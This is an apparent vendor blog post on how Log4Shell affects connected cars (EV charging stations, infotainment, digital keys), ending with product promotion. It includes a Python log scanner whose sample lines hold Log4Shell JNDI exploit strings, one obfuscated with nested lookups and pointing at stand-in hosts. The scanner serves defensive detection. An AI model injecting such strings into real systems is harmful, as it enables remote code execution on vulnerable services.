Uncovering Log4j Vulnerabilities in Connected Cars

September 13, 2022

Most IT and cybersecurity teams consider Log4Shell (CVE-2021-44228) to be one of the worst cyberthreats in recent years. With a severity score of 10 out of 10 (CVSS v3.1), this remote code execution (RCE) vulnerability enables malicious actors to execute arbitrary code, which could allow them to take over a targeted system from anywhere in the world.

Amazon, Apple, Cloudflare, Google, Tencent, Twitter and almost every company that uses Java were vulnerable targets at some point. Further expanding its attack surface, Log4Shell also affects the embedded systems and various electronic control units (ECUs) in connected cars, including charging stations, in-vehicle infotainment (IVI) and remote keyless entry (RKE) systems, among others. In research published in 2021, Trend Micro security researcher Sébastien Dudek discussed just how Log4j vulnerabilities also affect the automotive industry.

Charging stations at risk

Vehicle-to-grid (V2G) systems allow the energy stored in car batteries to be redistributed over the grid. A V2G system is composed of at least two parts: an electric vehicle (EV) and its charging station. These connect to a central management system through the Open Charge Point Protocol (OCPP), the network protocol for the growing EV industry across Europe and North America.

In this report by Trend Micro, threat researchers demonstrated how Log4Shell and two related vulnerabilities (CVE-2021-45046 and CVE-2021-45105) could provide attackers with backdoor access to vehicle charging stations that use a Java-based V2G stack.

IVI systems compromised in the wild

Aside from EV charging stations, the IVI systems of connected cars, especially those that include the Log4j library, could be at risk. Through demonstrations, various researchers have also shown that malicious actors can compromise Tesla automobiles using simple exploit strings, after which they can issue commands and steal sensitive data from the back-end servers. Cybercriminals could also use the Log4Shell vulnerability to push malicious firmware-over-the-air (FOTA) updates.
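The exploit strings mentioned above, and the ones that would reach a charging station over OCPP, all carry a Log4j lookup of the form `${jndi:...}` inside some logged field, often hidden behind nested `${lower:...}` or `${::-...}` lookups that Log4j resolves before the JNDI lookup fires. The following detector is an added example (not code from the original post, Trend Micro or VicOne) that a VSOC could run over charging-station or IVI logs; the OCPP-style log lines and the hosts in them are constructed.

```python
import re

# Constructed sample log lines (not from the original post); the hosts use
# documentation address ranges. Line 1 carries a direct lookup string, line 2
# the same lookup hidden behind nested lower-case lookups, line 3 a harmless lookup.
SAMPLE_LOGS = [
    '2022-09-13T10:00:01Z INFO ocpp BootNotification vendor="ACME" model="CP-200"',
    '2022-09-13T10:00:02Z INFO ocpp Authorize idTag="${jndi:ldap://198.51.100.7:1389/a}"',
    '2022-09-13T10:00:03Z INFO ocpp DataTransfer data="${${lower:j}ndi:${lower:r}mi://203.0.113.5/x}"',
    '2022-09-13T10:00:04Z WARN ivi headunit ua="${env:HOSTNAME}"',
]

# Innermost ${...} that has no further lookup nested inside it.
INNER = re.compile(r'\$\{([^${}]*)\}')
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

def _resolve(inner: str):
    """Text an innermost Log4j lookup collapses to, or None to leave it in place."""
    key, _, val = inner.partition(':')
    k = key.strip().lower()
    if k == 'jndi':          # the lookup we hunt for: never fold it away
        return None
    if ':-' in inner:        # ${x:-j} / ${::-j} default-value syntax
        return inner.rsplit(':-', 1)[1]
    if k == 'lower':
        return val.lower()
    if k == 'upper':
        return val.upper()
    return None              # env:, sys:, date: and others are left untouched

def _fold(m):
    folded = _resolve(m.group(1))
    return m.group(0) if folded is None else folded

def normalize(line: str, max_rounds: int = 20) -> str:
    """Peel nested lower/upper/default lookups until nothing more collapses."""
    for _ in range(max_rounds):
        new = INNER.sub(_fold, line)
        if new == line:
            break
        line = new
    return line

def is_jndi_probe(line: str) -> bool:
    return JNDI.search(normalize(line)) is not None

def scan(lines):
    """Indexes of the lines that carry a (possibly obfuscated) JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]
```

`scan(SAMPLE_LOGS)` flags lines 1 and 2, and `normalize` shows the de-obfuscated lookup so an analyst can see which host the station would have contacted.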

Digital keys vulnerable to Log4Shell?

Smartphones can now replace key fobs in RKE systems. The phones can unlock or even control some parts of a modern vehicle, but the applications that enable these features could be affected by the Apache Log4j vulnerability. Attackers could even change several of a car's configurations when exploiting the vulnerability.

VicOne solutions

Apache has since advised its users to update to the latest version of the library. Aside from software updates, VicOne recommends a more comprehensive automotive cybersecurity strategy to better protect today’s connected vehicles from severe vulnerabilities in the future.

As a prospective Trend Micro subsidiary, VicOne leverages the cybersecurity leader’s 30+ years of industry expertise and offers the following solutions:

  • xNexus, a detection and response (DR) platform for vehicle security operations centers (VSOCs), helps build situational awareness and early warning for incoming attacks.
  • xCarbon, an intrusion detection and prevention system (IDPS) for ECUs, provides superior detection and protection in vehicles, allowing security operations centers (SOCs) to quickly understand the nature of a potential attack.
  • xZETA allows OEMs to scan vendors' firmware on multiple levels and effectively reduces the attack surface from the beginning.
  • xScope is a penetration-testing service that conducts a deep assessment of an entire vehicle to identify vulnerabilities and provide recommendations.

To read more research on other possible vulnerabilities in connected vehicles and learn best security practices, visit our resource center.
